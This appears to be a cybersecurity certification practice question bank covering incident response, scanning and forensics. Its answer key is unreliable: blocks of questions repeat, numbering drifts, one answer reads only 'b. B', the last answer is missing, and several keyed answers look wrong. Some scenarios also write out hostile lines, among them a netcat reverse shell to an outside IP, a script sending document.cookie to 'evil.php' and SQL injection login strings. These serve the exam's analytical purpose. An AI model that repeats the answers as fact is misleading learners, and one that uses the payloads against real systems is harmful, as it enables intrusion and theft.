Bootcamp

Question 1

1. Which of the following command line utilities would an analyst use on an end-user PC to determine the parts it is listening on?

a. tracert
b. ping
c. nslookup
d. netstat

Answer 1

d. netstat

Question 2

2. An employee has been terminated for providing company confidential information to an outside party. The employee should not have had access to this information as part of the employee’s normal job function. Human resources have asked the security analyst to take possession of the computer and provide a copy of this hard drive to law enforcement, who will conduct a forensic investigation to look for information to help determine if they can bring criminal charges against the former employee. Which of the following steps should be taken when making a copy of the hard drive to provide to law enforcement?

a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.
b. Degauss the hard drive and then copy to a hard drive of at least equivalent size using ITFS formatting.
c. Log onto the computer with administrator privileges and copy the hard drive to an external storage device.
d. Provide the hard drive to law enforcement to conduct the forensic exam directly on the original hard drive.

Answer 2

a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.

Question 3

3. Which of the following is a vulnerability when using a window as a host OS for virtual machines?

a. Window requires frequent patching.
b. Windows virtualized environments are typically unstable.
c. Windows requires hundreds of open firewall ports to operate.
d. Windows is vulnerable to the “ping of death”.

Answer 3

a. Window requires frequent patching.

Question 4

4. A security analyst received an alert from the antivirus software identifying a complex instance of malware on a company’s network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process?

a. Wipe hard drives, reimage the system, and return the affected systems to a ready state.
b. Direct and analyze the precursors and indicators; schedule lessons learned meeting.
c. Remove the malware and inappropriate materials; eradicate the incident.
d. Perform event correlation; create a log retention policy.

Answer 4

a. Wipe hard drives, reimage the system, and return the affected systems to ready state.

Question 5

5. The security team has determined that the current incident response resources cannot meet management’s objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensation controls can be used to help meet management’s expectations?

a. Separation of duties
b. Scheduled reviews
c. Dual control
d. Outsourcing

Answer 5

d. Outsourcing

Question 6

6. Which of the following command line utilities would an analyst use on an end-user PC to determine the parts it is listening on?

a. Tracert
b. Ping
c. Nslookup
d. Netstat

Answer 6

d. Netstat

Question 7

7. An employee has been terminated for providing company confidential information to an outside party. The employee should not have had access to this information as part of the employee’s normal job function. Human resources has asked the security analyst to take possession of the computer and provide a copy of this hard drive to law enforcement, who will conduct a forensic investigation to look for information to help determine if they can bring criminal charges against the former employee. Which of the following steps should be taken when making a copy of the hard drive to provide to law enforcement?

a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.
b. Degauss the hard drive and then copy to a hard drive of at least equivalent size using ITFS formatting.
c. Log onto the computer with administrator privileges and copy the hard drive to an external storage device.
d. Provide the hard drive to law enforcement to conduct the forensic exam directly on the original hard drive.

Answer 7

a. Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media.

Question 8

8. Which of the following is a vulnerability when using window as a host OS for virtual machines?

a. Window requires frequent patching.
b. Windows virtualized environments are typically unstable.
c. Windows requires hundreds of open firewall ports to operate.
d. Windows is vulnerable to the “ping of death”.
=

Answer 8

a. Window requires frequent patching.

Question 9

9. A security analyst received an alert from the antivirus software identifying a complex instance of malware on a company’s network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process?

a. Wipe hard drives, reimage the system, and return the affected systems to ready state.
b. Direct and analyze the precursors and indicators; schedule a lessons learned meeting.
c. Remove the malware and inappropriate materials; eradicate the incident.
d. Perform event correlation; create a log retention policy.

Answer 9

a. Wipe hard drives, reimage the system, and return the affected systems to ready state.

Question 10

10. The security team has determined that the current incident response resources cannot meet management’s objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensation controls can be used to help meet management’s expectations?

a. Separation of duties
b. Scheduled reviews
c. Dual control
d. Outsourcing

Answer 10

d. Outsourcing

Question 11

11. ## An organization has had problems with security teams remediating vulnerabilities that are either false positives or are not applicable to the organization’s server. Management has put emphasis on security teams conducting details analysis and investigation before conducting any remediation. The output from a recent Apache web server scan is shown below:Scan Host: 192.168.1.18
    15-Jan-16 10:12:10.1 PDT
    Vulnerability CVE-2006-5752
    Cross-site scripting (XSS) vulnerability in the mod_status module of Apache server
    (httpd), when ExtendedStatus is enabled and a public-server-status page is used, allows remote attackers to inject arbitrary web script or HTML.
    Severity: 4.3 (medium)
    —
    The team performs some investigation and finds the statement from Apache on 07/02/2008. “Fixed in Apache HTTP server 2.2.6, 2.0.61, and 1.3.39”
    Which of the following conditions would require the team to perform remediation on this finding?

a. The organization is running version 2.2.6 and has ExtendedStatus enabled.
b. The organization is running version 2.0.59 and is not using a public-server-statuspage.
c. The organization is running version 1.3.39 and is using a public-sever-statuspage.
d. The organization is running version 2.0.5 and has ExtendedStatus enabled.

Answer 11

d. The organization is running version 2.0.5 and has ExtendedStatus enabled.

Question 12

13. Which of the following tools should an analyst use to scan for web server vulnerabilities?

a. Wireshark
b. Qualys
c. ArcSight
d. SolarWinds

Answer 12

b. Qualys

Question 13

14. An analyst preparing for a technical security compliance check on all Apache servers. Which of the following will be the BEST to use?

a. CIS benchmark
b. Nagios
c. Untidy
d. Chain & Abel

Answer 13

a. CIS benchmark

Question 14

15. A technician is troubleshooting a desktop computer with low disk space. The technician reviews the following information snippets:
    Disk Allocation Report
    350GB - C:\user1\movies\movies
    Network Stats
    Proto Local Address Foreign Address State
    TCP 0.0.0.0:8080 0.0.0.0 LISTENING movieDB
    TCP 192.168.1.10:8080 172.16.34.77:1200 TIME_WAIT
    Which of the following should the technician do the BEST resolve the issue based on the above information? (Select TWO)

a. Delete the movie\movies directory.
b. Disable the movieDB service.
c. Enable OS auto updates.
d. Install a file integrity tool.
e. Defragment the disk.

Answer 14

a. Delete the movie\movies directory.

b. Disable the movieDB service.

Question 15

16. A cybersecurity analyst was asked to review of web vulnerability scan logs. Given the following snippet of code:
    Iframe src=”http://65.240.22.1” width=”0” height=”0” franeborder=”0”
    tabindex=”-1” title=”empty” style=visibility:hidden;display:none
    /iframe
    Which of the following BEST describes the situation and recommendations to be made?

a. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name.
b. The security analyst has discovered an embedded iframe that is hidden from users accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present.
c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
d. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.

Answer 15

c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.

Question 16

17. A cybersecurity analyst is currently auditing a new Active Directory server for compliance. The analyst uses Nessus to do the initial scan, and Nessus reports the following:
    PluginID IP Port
    10955 192.168.1.215 Microsoft-ds (445/tcp)
    11210 192.168.1.215 Microsoft-ds (445/tcp)
    12350 192.168.1.215 Netbus (35/udp)
    12345 192.168.1.215 Ftp (21/tcp)
    Which of the following critical vulnerabilities has the analyst discovered?

a. Known backdoor
b. Zero-day
c. Path disclosure
d. User enumeration

Answer 16

a. Known backdoor

Question 17

18. Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Select THREE).

a. Multifactor authentication
b. Network segmentation
c. Single sign-on
d. Encryption
e. Complexity policy
f. Biometrics
g. Obfuscation

Answer 17

a. Multifactor authentication
b. Network segmentation
e. Complexity policy

Question 18

19. A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive customer feedback and store it in a local database. The web server is placed in a DMZ network, and the web service and file system have been hardened. However, the cybersecurity analyst discovers that data from the database can be mined from over the internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

a. Configure the database to listen for incoming connections on the internet network.
b. Change the database connection string and apply the necessary patches.
c. Configure an ACL in the border firewall to block all connections to the webserver for ports different than 80 and 443.
d. Deploy a web application firewall to protect the web application from attacks to the database.

Answer 18

c. Configure an ACL in the border firewall to block all connections to the webserver for ports different than 80 and 443.

Question 19

20. A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Select TWO).

a. Validate the folder and file directory listings on both.
b. Check the hash value between the image and the original.
c. Boot up the image and the original system to compare.
d. Connect a write blocker to the imaging device.
e. Copy the data to a disk of the same size and manufacturer.

Answer 19

b. Check the hash value between the image and the original.

d. Connect a write blocker to the imaging device.

Question 20

21. A company’s IDP/DLP solution triggered the following alerts:

a. 02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234
b. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25
c. 02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53
d. 02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445
e. 02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21

Answer 20

b. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25

Question 21

21. **A company’s IDP/DLP solution triggered the following alerts:

a. 02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234
b. 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25
c. 02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53
d. 02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445
e. 02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21

Answer 21

b. B

Question 22

22. A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior?

a. Phishing
b. Whaling
c. Spam
d. Ransomware

Answer 22

b. Whaling

Question 23

23. A security analyst is conducting traffic analysis and observes an HTTP POST to the company’s main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of?

a. Exfiltration
b. DoS
c. Buffer overflow
d. SQL injection

Answer 23

a. Exfiltration

Question 24

24. A security analyst wants to confirm a finding from a penetration test report on the internal webserver. To do so, the analyst logs into the webserver using SSH to send the request locally. The report provides a link to https://hrserver.internal/../etc/paswd. And the server IP address is 10.10.10.15 However, after several attempts, the analyst cannot get the file, despite attempting to get it using different ways, as shown below:
    Request Response
    https://hrserver.internal/../…/etc/paswd Host not found
    https://localhost/../…/etc/passwd File not found
    https://10.10.10.15/../…/etc/passwd File not found
    Which of the following would explain this problem? (Select TWO)

a. The web server uses SNI to check for a domain name.
b. Request can only be sent remotely to the webserver
c. There is no local name resolution for hrserver internal
d. The password file is write protected
e. The web server has not started

Answer 24

a. The web server uses SNI to check for a domain name.

c. There is no local name resolution for hrserver internal

Question 25

25. A SIEM alert occurs with the following output:
    Mac IP Duration Logged on
    01:23:45:33:89:cc 192.168.122.3 15 h gours Yes
    01:23:45:33:89:cc 192.168.122.9 4 days Yes
    Which of the following BEST describes this alert?

a. The alert is a positive, there is a device with dual NICs.
b. The alert is valid because IP spoofing may be occurring on the network.
c. The alert is a false positive, both NICs are of the same brand.
d. The alert is valid because there may be a rogue device on the network

Answer 25

d. The alert is valid because there may be a rogue device on the network

Question 26

26. A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem?

a. The access point is blocking access by MAC address. Disable MAC address filtering.
b. The network is not available. Escalate the issue to network support.
c. Expired DNS entries exist on users’ devices. Request the affected users perform a DNS flush.
d. The access point is a rogue device. Follow incident response procedures.

Answer 26

d. The access point is a rogue device. Follow incident response procedures.

Question 27

27. An application contains the following log entries in a file named “authlog.log”.
    User ‘oidc-provider-fb:john’ successfully logged in 2016-01-01 23:00:01
    User ‘local:Administrator’ successfully logged out 2016-01-01 23:00:05
    User ‘oidc-provider-fb:kate’ successfully logged out 2016-01-01 23:00:07
    A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task?

a. grep -e “successfully” authlog.log | awk ‘{print $2}’ | sed s/\’//g
b. cat authlog.log | grep “2016-01-01” | echo “valid username found: $2”
c. echo authlog.log > sed ‘s/User//’ | print “username exists: $user”
d. cat “authlog.log” | grep “User” | cut -F’ ‘ | “username exists: $1”

Answer 27

a. grep -e “successfully” authlog.log | awk ‘{print $2}’ | sed s/\’//g

Question 28

28. An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process?

a. Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.
b. Refine testing in the development environment to include fuzzing and user acceptance testing so applications are more stable before they migrate to production.
c. Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate users to the alternate production environment.
d. Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities.

Answer 28

a. Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.

Question 29

29. When reviewing the system log, the cybersecurity analyst noticed a suspicious log entry.
    • Wmic /node:HRDepartment1 computersystem get username
    Which of the following combinations describes what occurred, and what action should be taken in this situation?

a. A rogue user has queried for users logged in remotely. Disable local access to network shares.
b. A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command.
c. A rogue user has queried for the administrator logged into the system. Disable local access to use cmd prompt.
d. A rogue user has queried for the user logged in remotely. Attempt to determine who executed the command.

Answer 29

d. A rogue user has queried for the user logged in remotely. Attempt to determine who executed the command.

Question 30

30. A security analyst is investigating the possible compromise of a production server for the company’s public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:
    + Server: nginx/1.4.6 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The x-xss-Protection header is not defined. This header can hint to the user
    agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to
    render the content of the site in a different fashion to the MIME type
    + No CGT Directories found (use ‘-c all’ to force check all the possible dirs)
    + Entry ‘/wp-admin/’ in robots.txt returned a non-forbidden or redirect HTTP code
    (302)
    + “Robots.txt” contains two entries that should be manually viewed.
    In some of the portal’s startup command files, the following command appears:
    Nc -e /bin/sh 72.14.1.36 4444
    Investigating further, the analyst runs Netstat and obtains the following output:
    # netstat -an
    Active Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State
    tcp 0 0 *:443 : LISTEN
    tcp 0 52 *:59482 72.14.1.36:4444 ESTABLISHED
    tcp 0 0 *:80 : LISTEN
    Which of the following is the best step for the analyst to take NEXT?

a. Initiate the security incident response process.
b. Recommend training to avoid mistakes in production command files.
c. Delete the unknown files from the production servers.
d. Patch a new vulnerability that has been discovered
e. Manually review the robots.txt file for error

Answer 30

a. Initiate the security incident response process.

Question 31

31. A cybersecurity analyst wants to use a tool that prevents vulnerabilities in software from being successfully exploited. Which of the following tools can be implemented to achieve this goal?

a. HIPS
b. EMET
c. Helix
d. Nessus

Answer 31

a. HIPS

Question 32

32. Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record?
    a. ifconfig
    b. ping
    c. arp
    d. nbtstat

Answer 32

b. ping

Question 33

33. Which of the following describes why it is important for an organization’s incident response team and legal department to meet and discuss communication processes during the incident response process?

a. To comply with existing organizational policies and procedures on interacting with internal and external parties.
b. To ensure all parties, know their roles and effective lines of communication are established
c. To identify which group will communicate details to law enforcement in the event of a security incident
d. To predetermine what details should or should not be shared with internal or external parties in the event of an incident

Answer 33

b. To ensure all parties, know their roles and effective lines of communication are established

Question 34

34. During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the team. Which of the following information should be shown to the officer?

a. Letter of engagement
b. Scope of work
c. Timing information
d. Team reporting

Answer 34

b. Scope of work

Question 35

35. A security administrator recently deployed a virtual honeynet. The honeynet is not protected by the company’s firewall, while all production networks are protected by a stateful firewall. Which of the following would BEST allow an external penetration tester to determine which one is the honeynet’s network?

a. Banner grab
b. Packet analyzer
c. Fuzzer
d. TCP ACK scan

Answer 35

d. TCP ACK scan

Question 36

36. A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included.
    Source Destination Application Packets Volume (kbps)
    8.4.4.100 172.16.1.25 SMTP 4386 6141
    96.23.114.14 172.16.1.1 ITSec 7734 10827
    172.16.1.101 100.15.25.34 HTTP 3412 4776
    96.23.114.18 172.16.1.1 IPSec 2723 3812
    172-16.1.101 100.15.25.34 SSL 8697 12176
    172.16.1.222 203.67.121.12 Quicktime 1302 1822
    172.16.1.197 113.121.12.15 8180/tcp 6045 8463
    172.16.1.131 172.16.1.67 DHCP 25 35
    172.16.1.25 172.16.1.53 DNS 66 93
    Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues?

a. Perform a reverse lookup on each of the IP addresses listed to help determine if the traffic is necessary.
b. Recommend that networking block the unneeded protocols such as QuickTime to clear up some of the congestion.
c. Put ACLs in place to restrict traffic destined for random or non-default application ports.
d. Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.

Answer 36

c. Put ACLs in place to restrict traffic destined for random or non-default application ports.

Question 37

37. During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in form multiple external locations, including several overseas. Further review of the account showed access right to several corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk?

a. RADIUS identity management
b. Context-based authentication
c. Privilege escalation restrictions
d. Elimination of self-service password resets

Answer 37

b. Context-based authentication

Question 38

38. On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability?

a. VDI systems
b. Mobile devices
c. Enterprise server Oss
d. VPNs
e. VoIP phones

Answer 38

b. Mobile devices

Question 39

39. A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation?

a. Fuzzing
b. Input validation
c. Change control
d. Sandboxing

Answer 39

c. Change control

Question 40

40. The SOC shift supervisor is looking through the administrator access logs for the key network devices. The supervisor notices there are no administrative access entries for the previous day but knows IOS upgrades were scheduled on key network devices, according to the change control board notifications form the last shift logs. Which of the following is the MOST likely cause?

a. Someone cleared the log files to cover malicious activity.
b. Updates and upgrades were pushed out to a later date.
c. SNMP community string was changed in the upgrade process.
d. There were issues aggregating the individual log files into the administrator access logs.

Answer 40

a. Someone cleared the log files to cover malicious activity.

Question 41

41. A cybersecurity analyst is currently using Nessus to scan several FTP servers. Upon receiving the results of the scan, the analyst needs to further test to verify that the vulnerability found exits. The analyst uses the following snippet of code:
    Username: admin ‘ ; –
    Password: ‘ OR 1=1 –
    Which of the following vulnerabilities is the analyst checking for?

a. Buffer overflow
b. SQL injection
c. Default password
d. Format string attack

Answer 41

b. SQL injection

Question 42

42. The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document management’s intent to set this control level. Which of the following is the appropriate means to achieve this?

a. A control
b. A standard
c. A policy
d. A guideline

Answer 42

c. A policy

Question 43

43. ** An analyst suspects a large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST?

a. Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated.
b. Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data.
c. Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted.
d. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

Answer 43

d. Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.

Question 44

44. Given the following code:

var adr =”../evil.php?breadomonster=’ +escape{document.cookie};
var query = “SELECT * FROM users WHERE name=’smith’;

Which of the following types of attacks is occurring?

a. Privilege escalation
b. XSS
c. Session hijacking
d. MITM
e. SQL injection

Answer 44

b. XSS

Question 45

45. ** Which of the following should be used to correlate multiple events from different regions, time zones, and time periods?

a. Snort
b. ArcSight
c. Imperva
d. Nessus

Answer 45

b. ArcSight

Question 46

46. ** A security analyst is running a penetration test against a client’s external firewall. The analyst runs an attack that attempts to flood the firewall from multiple locations while denying access to others. Which of the following attacks did the analyst perform?

a. Fuzzing
b. DDoS
c. Ping of death
d. MITM

Answer 46

b. DDoS

Question 47

47. A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usauge, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, even though no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason that no significant changes in work habits have occurred? An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?

a. Advanced persistent threat
b. Zero day
c. Trojan
d. Logic bomb

Answer 47

b. Zero day

Question 48

48. A technician receives an alert indicating an endpoint is beaconing to a suspect dynamic DNS domain. Which of the following countermeasures should be used to BEST protect the network in response to this alert? (Select TWO)

a. Set up a sinkhole for that dynamic DNS domain to prevent communication.
b. Isolate the infected endpoint to prevent the potential spread of malicious activity.
c. Implement an internal honeypot to catch the malicious traffic and trace it.
d. Perform a risk assessment and implement compensating controls.
e. Ensure the IDS is active on the network segment where the endpoint resides.

Answer 48

a. Set up a sinkhole for that dynamic DNS domain to prevent communication.
b. Isolate the infected endpoint to prevent the potential spread of malicious activity.

Question 49

49. ** After a review of user account activity, it appears certain user accounts were being used to access critical systems that are unrelated to the user’s roles and responsibilities. The user accounts in question were disabled, but then other user accounts were used to perform the same activity soon after. Which of the following is the BEST remediation to stop this violation?

a. Reconfigure Radius.
b. Implement MFA.
c. Upgrade to the latest TLS.
d. Salt password hashes.

Answer 49

b. Implement MFA.

Question 50

50.	A company installed a wireless network more than a year ago, standardizing on the same model APs in a single subnet. Recently, several users have reported timeouts and connection issues with Internet browsing. The security administrator has gathered some information about the network to try to recreate the issues with the assistance of a user. The administrator can ping every device on the network and confirms that the network is very slow.
Administrator’s PC: 192.168.1.20
User’s PC: 192.168.1.22
AP-Finance: 192.168.1.10
AP-Workshop: 192.168.1.11
AP-Lounge: 192.168.1.12
AP-Reception: 192.168.1.13
AP-Warehouse: 192.168.1.14
AP-IT: 192.168.1.15
Output
Interface: 192.168.1.20 --- 0xf
Internet Address Physical Address Type
192.168.1.4 1a-25-0d-df-c6-27 dynamic
192.168.1.5. 1a-25-0d-df-c8-00 dynamic
192.168.1.10 00-dc-3b-67-81-1a dynamic
192.168.1.11 c4-02-03-a1-4a-01 dynamic
192.168.1.12 00-dc-3b-67-82-02 dynamic
192.168.1.13 00-dc-3b-a5-ba-0b dynamic
192.168.1.14 00-dc-3b-67-88-07 dynamic
192.168.1.15 00-dc-3b-67-80-0a dynamic
192.168.1.20 1a-25-0d-df-8d-82 dynamic
192.168.1.22 1a-25-0d-df-89-cb dynamic
Given the above result, which of the following should the administrator investigate FIRST?

a. The AP-Workshop device
b. The AP-Reception device
c. The device at 192.168.1.4
d. The AP-IT device389
e. The user’s PC

Answer 50

b. The AP-Reception device

Question 51

51. A security analyst’s daily review of system logs and SIEM showed fluctuating patterns of latency. During the analysis, the analyst discovered recent attempts of intrusion-related to malware that overwrite the MBR. The facilities manager informed the analyst that a nearby construction project damaged the primary power lines, impacting the analyst’s support systems. The electric company has temporarily restored power, but the area may experience temporary outages. Which of the following issues should the analyst focus on to continue operations?

a. Updating the ACL
b. Conducting backups
c. Virus scanning
d. Additional log analysis

Answer 51

b. Conducting backups

Question 52

52. ** In comparison to non-industrial IT vendors, ICS equipment vendors generally.

a. Rely less on proprietary code in their hardware products.
b. Have more mature software development models.
c. Release software updates less frequently.
d. Provide more extensive vulnerability reporting.

Answer 52

c. Release software updates less frequently.

Question 53

53. During routine network reconnaissance that is looking for unused but open ports, a company’s scans generate the following packet captures:
    132 17.816492 192.168.1.132 192.168.1.1 TCP 58 49151 -> 22 [SYN] Seq=0 win=1024 Len=0
    MSS=1460
    133 17.816942 192.168.1.132 192.168.1.1 TCP 58 49151 -> 445 [SYN] Seq=0 win=1024
    Len=0 MSS=1460
    134 17.818683 192.168.1.1 192.168.1.132 TCP 58 22 -> 19151 [SYN, ACK] Seq=0 Ack=1
    win=5840 Len=0 MSS=1460
    134 17.818683 192.168.1.1 192.168.1.132 TCP 58 22 -> 49151 [SYN, ACK] Seq=0 Ack=1
    win=5840 Len=0 MSS=1460
    135 17.819546 192.168.1.132 192.168.1.1 TCP 58 49151 -> 80 [SYN] Seq=0 win=1024 Len=0
    MSS=1460
    136 17.824887 192.168.1.1 192.168.1.132 TCP 54 445 -> 49151 [RST, ACK] Seq=1 Ack=1
    win=0 Len=0
    137 17.829763 192.168.1.1 192.168.1.132 TCP 54 80-> 49151 [RST, ACK] Seq=1 Ack=1
    Win=0 =Len=0
    138 22.063352 192.168.1.1 192.168.1.132 TCP 58 [TCP Retransmission] 22 -> 49151 [SYN,
    ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460
    Which of the following is the BEST reason for the retransmission is packet 138?

a. Port 22 is closed, and 192.168.1.1 is attempting to complete the closure.
b. Port 22 is open, and 192.168.1.132 is attempting to continue the handshake.
c. port 22 is closed, and 192.168.1.132 is attempting to complete the closure.
d. Port 22 is open, and 192.168.1.1 is attempting to continue the handshake.

Answer 53

b. Port 22 is open, and 192.168.1.132 is attempting to continue the handshake.

Question 54

54. ** An organization has a policy prohibiting remote administration of servers where web services are running. One of the Nmap scans is shown here:
    Starting Nmap 4.67 (http://map.org) at 2011-11-03 18:32 EDT
    Nmap scan report for 192.168.1.13
    Host is up (0.00066s latency).
    />Not shown: 992 closed ports
    PORT STATESERVICE
    22/tcp open ssh
    80/tcp open http
    111/tcp open rpcbind
    139/tcp open netbios-ssn
    3306 open mysql
    MAC Address:01:AA:FB:23:21:45
    Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
    Given the organization’s policy , which is the following services should be disabled on this server?

a. rpcbind
b. netbios-ssn
c. mysql
d. ssh
e. talent

Answer 54

d. ssh

Question 55

55. ## A system’s authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthorization activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below.Scan Host: 192.168.1.13
    15-Jan-16 08:12:10.1 EDT
    Vulnerability CVE-2015-1635
    HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and
    Windows Server 2012 allows remote attackers to execute arbitrary code via crafted HTTP
    requests, aka “HTTP.sys remote code execution vulnerability”
    Severity: 10.0 (high)
    Expected Result: enforceHTTPValidation=’enabled’;
    Current Value: enforceHTTPValidatoin=enabled;
    Evidence:
    C:\8system8\windows\config\web.config
    ———

a. Remediate by going to the web.config file, searching for the enforce HTTP validation the setting, and manually updating to the correct.
b. Accept this risk for now because this is a “high” severity, but testing will require more than the four days available, and the system ATO needs to be completed.
c. Ignore it. This is a false positive, and the organization needs to focus its efforts on other findings.
d. Ensure HTTP validation is enabled by rebooting the server.

Answer 55

a. Remediate by going to the web.config file, searching for the enforce HTTP validation setting, and manually updating to the correct.

Question 56

56. ** A security administrator has uncovered a covert channel used to exfiltrate confidential data from an internal database server through a compromised corporate web server. Ongoing exfiltration is accomplished by embedding a small amount of data extracted from the database into the metadata of images served by the webserver. File timestamps suggest that the server was initially compromised six months ago using a common server misconfiguration. Which of the following BEST describes the type of threat being used?

a. APT
b. Zero-day attack
c. Man-in-the-middle attack
d. XSS

Answer 56

a. APT

Question 57

57. ** A security analyst has been asked to scan a subnet. During the scan, the following output was
    generated.sho
    [root@scanbox-]# nmap 192.168.100.*
    Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2015-10-10 19:10 EST
    Interesting ports on ports on purple.company.net (192.168.100.145):
    Not shown:1677 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    53/tcp open domain
    111/tcp open rpcbind
    Interesting ports on lemonyellow.company.net (192.168.100.214)
    Not shown: 1676 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    111/tcp open rpcbind
    443/tcp open ssl/http
    Nmap finished : 256 IP addresses (2 hots up) scanned in 7.223 seconds
    Based on the output above, which of the following is MOST likely?

a. 192.168.100.214 is a secure FTP server.
b. 192.168.100.214 is a web server.
c. Both hosts are mail servers.
d. 192.168.100.145 is a DNS server.

Answer 57

b. 192.168.100.214 is a web server.

Question 58

59. ** A company uses a managed IDS system, and a security analyst has noticed a large volume of brute force password attacks originating from a single IP address. The analyst put in a ticket with the IDS provider, but no action was taken for 24 hours, and the attacks continued. Which of the following would be the BEST approach for the scenario described?

a. Draft a new MOU to include response incentive fees.
b. Reengineer the BPA to meet the organization’s needs.
c. Modify the SLA to support organizational requirements.
d. Implement on MOA to improve vendor responsiveness.

Answer 58

c. Modify the SLA to support organizational requirements.

Question 59

60. ** The help desk has reported that users are reusing previous passwords when prompted to change them. Which of the following would be the MOST appropriate control for the security analyst to configure to prevent password reuse? (Select TWO)

a. Implement mandatory access control on all workstations.
b. Implement role-based access control within directory services.
c. Deploy Group Policy Objects to domain resources.
d. Implement scripts to automate the configuration of PAM of Linux hosts.
e. Deploy a single sign-on solution for both Windows and Linux hosts.

Answer 59

